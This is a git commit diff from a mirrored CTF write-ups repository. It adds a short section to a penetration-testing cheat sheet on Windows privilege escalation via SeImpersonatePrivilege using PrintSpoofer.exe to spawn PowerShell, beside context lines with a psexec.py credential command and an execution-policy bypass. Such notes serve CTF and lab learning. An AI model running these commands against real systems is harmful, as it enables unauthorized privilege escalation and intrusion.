mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 03:53:03 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
d01089cefd
commit
35d86dc3e4
1 changed files with 5 additions and 0 deletions
|
@ -243,6 +243,11 @@ dir /a:h `show only hidden files`<br/>
|
|||
### Psexec.py
|
||||
` python psexec.py DOMAIN/USER:PASS@IP`
|
||||
|
||||
### Privlege Escalation using SeImpersonatePrivilege
|
||||
|
||||
If this is enabled we can upload `Printspoofer.exe ` and place it if we have rights
|
||||
|
||||
`PrintSpoofer.exe -i -c powershell.exe`
|
||||
|
||||
### Active Directory
|
||||
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
|
||||
|
|
Loading…
Reference in a new issue